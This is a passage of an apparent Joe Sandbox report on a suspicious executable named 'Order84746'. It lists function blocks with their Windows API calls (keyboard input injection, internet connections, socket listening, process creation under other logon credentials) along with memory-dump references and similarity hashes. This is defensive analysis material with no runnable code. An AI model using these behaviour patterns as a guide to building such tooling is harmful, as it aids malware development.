                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: 65561649fde9c7420feeb7318c689662c66ae4fcc3e070ebf490a7682640059f
                          • Instruction ID: 827e03d13e33cf64d76be920f925dcd89b6f11df919c51986f96544b413c4c21
                          • Opcode Fuzzy Hash: 65561649fde9c7420feeb7318c689662c66ae4fcc3e070ebf490a7682640059f
                          • Instruction Fuzzy Hash: 3F514AB5A05209AFCF20DF68C880EAE7BB9EF55360F108659F965DB290D770ED41CB90
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0091C462
                          • __itow.LIBCMT ref: 0091C49C
                            • Part of subcall function 0091C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0091C753
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0091C505
                          • __itow.LIBCMT ref: 0091C55A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: e891a03f4906c77a852b31d5f1660212838928cfd5ece9b8efa7d40b803ef24a
                          • Instruction ID: 33c5ec746b20c9c7c29c4e34353d7e8805912c0e97caff266ffe324cd5dd6039
                          • Opcode Fuzzy Hash: e891a03f4906c77a852b31d5f1660212838928cfd5ece9b8efa7d40b803ef24a
                          • Instruction Fuzzy Hash: 6641A471B4424DAFDF11DF58C851BEE7BB9EF49704F000019FA05E7291DB749A858BA2
                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00923966
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00923982
                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009239EF
                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00923A4D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: d6cfb4ff623d11c3c9183506daf5c14c9695dd9113eed26c1f9892130234d4f4
                          • Instruction ID: 1eba9accf0ba48da2a0e31e58635064f755aab2abbaa4db330e58e091dd0fe69
                          • Opcode Fuzzy Hash: d6cfb4ff623d11c3c9183506daf5c14c9695dd9113eed26c1f9892130234d4f4
                          • Instruction Fuzzy Hash: 03412974E04228EAEF209B64E8057FDBBB99B56310F04815AF4C1521C9C7BD8EC5E765
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0092E742
                          • GetLastError.KERNEL32(?,00000000), ref: 0092E768
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0092E78D
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0092E7B9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: 6ec06461f4902e588c81f49415b14d1287c9632ee0cdb17d65710ca6f309a681
                          • Instruction ID: 05fc83ca8db79184939f9d0e65e18e53d2c39d175fe001dec863f7d5032db5af
                          • Opcode Fuzzy Hash: 6ec06461f4902e588c81f49415b14d1287c9632ee0cdb17d65710ca6f309a681
                          • Instruction Fuzzy Hash: 75413D39600650DFCF11EF1AC58495DBBE5FF59710B098498E956AB3A2CB74FD00CB92
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0094B5D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 39f8cee51d674095dfb909c8a55db5b02435da6946b3c917b5afde6a5cd75f7d
                          • Instruction ID: 423aab39cb498a667d8615c0205bb42a9ad10af18af9a9f30206558c20b3ff5e
                          • Opcode Fuzzy Hash: 39f8cee51d674095dfb909c8a55db5b02435da6946b3c917b5afde6a5cd75f7d
                          • Instruction Fuzzy Hash: 0C313134611208BFEF349F18CC88FECB768EB06320F648506FA11D62E1C734E940AB92
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0094D807
                          • GetWindowRect.USER32(?,?), ref: 0094D87D
                          • PtInRect.USER32(?,?,0094ED5A), ref: 0094D88D
                          • MessageBeep.USER32(00000000), ref: 0094D8FE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 44949746f9887cebd4098f0f22f9fc7786120551838d5f8d115dea2b7d513ba0
                          • Instruction ID: 0b2ad69e510be99ba6360552581824074ea424b7675d75e3fc8bd4c01d8a2c16
                          • Opcode Fuzzy Hash: 44949746f9887cebd4098f0f22f9fc7786120551838d5f8d115dea2b7d513ba0
                          • Instruction Fuzzy Hash: 84419A78A06219DFCB11DF58C884FA97BB9FF4A754F1881A9E415CB360D330E941DB80
                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00923AB8
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00923AD4
                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00923B34
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00923B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 92824cd45d786752cc0d6b56e3d6e72d3a5781eba2e69c73208ff30b33b19c43
                          • Instruction ID: 705c3eaa0bb149d607eb1217d0622d161b02d2d46ebc923eb548b5277c13e452
                          • Opcode Fuzzy Hash: 92824cd45d786752cc0d6b56e3d6e72d3a5781eba2e69c73208ff30b33b19c43
                          • Instruction Fuzzy Hash: 75314630A04278AEEF208F64E819BFE7BB99B55311F04811AE482932D9C77C8F85D761
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00914038
                          • __isleadbyte_l.LIBCMT ref: 00914066
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00914094
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009140CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: ce8e9a314a1b60ff53a83b07153d39a200075b65dd8e339f8d70ce09411b4fb5
                          • Instruction ID: d3fdfd1b3291dcb29b3b0cd4695b73bf3b8e603417df1836f4beb98e9b6e2ee6
                          • Opcode Fuzzy Hash: ce8e9a314a1b60ff53a83b07153d39a200075b65dd8e339f8d70ce09411b4fb5
                          • Instruction Fuzzy Hash: B731B03170420AAFDB219F76CC44BEA7BA9BF4D310F158428E6659B1A0E731D8D1DB90
                          APIs
                          • GetForegroundWindow.USER32 ref: 00947CB9
                            • Part of subcall function 00925F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00925F6F
                            • Part of subcall function 00925F55: GetCurrentThreadId.KERNEL32 ref: 00925F76
                            • Part of subcall function 00925F55: AttachThreadInput.USER32(00000000,?,0092781F), ref: 00925F7D
                          • GetCaretPos.USER32(?), ref: 00947CCA
                          • ClientToScreen.USER32(00000000,?), ref: 00947D03
                          • GetForegroundWindow.USER32 ref: 00947D09
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: e6e82c3570dab6ee9a951ef69735e5ea7e75dd03e0cc8cbeaaa1a45ce2a3e6e0
                          • Instruction ID: f9b2bc2987fc6db8267c55154324ff175674c0c3c43fc6fe98d482ca18b70988
                          • Opcode Fuzzy Hash: e6e82c3570dab6ee9a951ef69735e5ea7e75dd03e0cc8cbeaaa1a45ce2a3e6e0
                          • Instruction Fuzzy Hash: 76313071D00108AFCB00EFB9D8419EFFBF9EF94310B11846AE915E3251DA309E058BA1
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00934358
                            • Part of subcall function 009343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00934401
                            • Part of subcall function 009343E2: InternetCloseHandle.WININET(00000000), ref: 0093449E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 1463438336-0
                          • Opcode ID: db7ccbd90fab7b04128c7a4d18431397e156837cd5deacffc4cb213f18e879d9
                          • Instruction ID: d71d310e9dde22b8ffd58322e2f4adb98a5e4e3408923cc92640a0f38f219d57
                          • Opcode Fuzzy Hash: db7ccbd90fab7b04128c7a4d18431397e156837cd5deacffc4cb213f18e879d9
                          • Instruction Fuzzy Hash: 8A21D175645601BBEB159F609D00FBBB7ADFF88710F01441EFA1597650DBB1A820AF90
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0091AFAE
                          • OpenProcessToken.ADVAPI32(00000000), ref: 0091AFB5
                          • CloseHandle.KERNEL32(00000004), ref: 0091AFCF
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0091AFFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 2621361867-0
                          • Opcode ID: 7638df644d1710e987d809f330b481bdc991f487e88695df1a51f568d4bb8378
                          • Instruction ID: 1855bddcd351d6d7d771cd09d1add97efd47c8576c5884c0ef1346f13463831e
                          • Opcode Fuzzy Hash: 7638df644d1710e987d809f330b481bdc991f487e88695df1a51f568d4bb8378
                          • Instruction Fuzzy Hash: B9214FB260620DABDF018FA5DD09FEE7BA9AF44304F044019F901A2261C3759D55EB61
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00948AA6
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00948AC0
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00948ACE
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00948ADC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 340655de86273bac525a07ff6640643479de339be020933259da49867a413044
                          • Instruction ID: d0d0512007978bb88d34ec866a9032ace48a8d631fc612bb6ddd6b01ce0bc3ce
                          • Opcode Fuzzy Hash: 340655de86273bac525a07ff6640643479de339be020933259da49867a413044
                          • Instruction Fuzzy Hash: A2119A31345111ABEB04AB29DC05FBE779DFF86320F148519F926C72E1CBA4AC008B91
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00938AE0
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00938AF2
                          • accept.WS2_32(00000000,00000000,00000000), ref: 00938AFF
                          • WSAGetLastError.WS2_32(00000000), ref: 00938B16
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          • Opcode ID: b80a481cdc24951047e8b10378c5628f1a1ffe2094254a8a1cfd6be5790c4d76
                          • Instruction ID: c2eb2ab6a24c5a63c2604c3abb8f7f906f7b7c493a35ad9c579508a323ae6e97
                          • Opcode Fuzzy Hash: b80a481cdc24951047e8b10378c5628f1a1ffe2094254a8a1cfd6be5790c4d76
                          • Instruction Fuzzy Hash: C321A572A001249FC7219F69DC85A9EBBFCEF4A310F00816AF949D7290DB74DA418FA1
                          APIs
                            • Part of subcall function 00921E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00920ABB,?,?,?,0092187A,00000000,000000EF,00000119,?,?), ref: 00921E77
                            • Part of subcall function 00921E68: lstrcpyW.KERNEL32(00000000,?,?,00920ABB,?,?,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00921E9D
                            • Part of subcall function 00921E68: lstrcmpiW.KERNEL32(00000000,?,00920ABB,?,?,?,0092187A,00000000,000000EF,00000119,?,?), ref: 00921ECE
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00920AD4
                          • lstrcpyW.KERNEL32(00000000,?,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00920AFA
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00920B2E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: c53d2b29be16c1e3c1b7043af4544b08559c387d641a23e0363bc6b552980f0d
                          • Instruction ID: 64752039109594e606a9c2f77a9cf0fb443f858932a3b30868c1b875e925c60a
                          • Opcode Fuzzy Hash: c53d2b29be16c1e3c1b7043af4544b08559c387d641a23e0363bc6b552980f0d
                          • Instruction Fuzzy Hash: A911E636600315AFDF25AF34EC05E7A77A8FF89354B80406AF906CB255EB719850D7A1
                          APIs
                          • _free.LIBCMT ref: 00912FB5
                            • Part of subcall function 0090395C: __FF_MSGBANNER.LIBCMT ref: 00903973
                            • Part of subcall function 0090395C: __NMSG_WRITE.LIBCMT ref: 0090397A
                            • Part of subcall function 0090395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001), ref: 0090399F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: abed9df712548ee620b190b011c1d37b914660d29e83a9c6044e31d647bbc627
                          • Instruction ID: cde8b0dd3b552c9dda6c8a08876cee60a1e6db485521fe02173022ad8bd9f90a
                          • Opcode Fuzzy Hash: abed9df712548ee620b190b011c1d37b914660d29e83a9c6044e31d647bbc627
                          • Instruction Fuzzy Hash: EC11CD31B09219AFDB313FB0AC0579A7BE8AF84370F208919F85996391DB74C99196D0
                          APIs
                          • _memset.LIBCMT ref: 008FEBB2
                            • Part of subcall function 008E51AF: _memset.LIBCMT ref: 008E522F
                            • Part of subcall function 008E51AF: _wcscpy.LIBCMT ref: 008E5283
                            • Part of subcall function 008E51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E5293
                          • KillTimer.USER32(?,00000001,?,?), ref: 008FEC07
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008FEC16
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00953C88
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          • Opcode ID: 6f6f904cf5704ac2f840bda0e92610e39c111acc51222593c270c0ab769d46e4
                          • Instruction ID: 928c6b087b8c37a77ac8e6e4aa6d608dad6580bdefe08a1225146da60d3cd85f
                          • Opcode Fuzzy Hash: 6f6f904cf5704ac2f840bda0e92610e39c111acc51222593c270c0ab769d46e4
                          • Instruction Fuzzy Hash: AE21DA709087949FE732DB38C855BE7BBECEB05309F04048DEB9A96291C7B42A848B51
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009205AC
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009205C7
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009205DD
                          • FreeLibrary.KERNEL32(?), ref: 00920632
                          Memory Dump Source
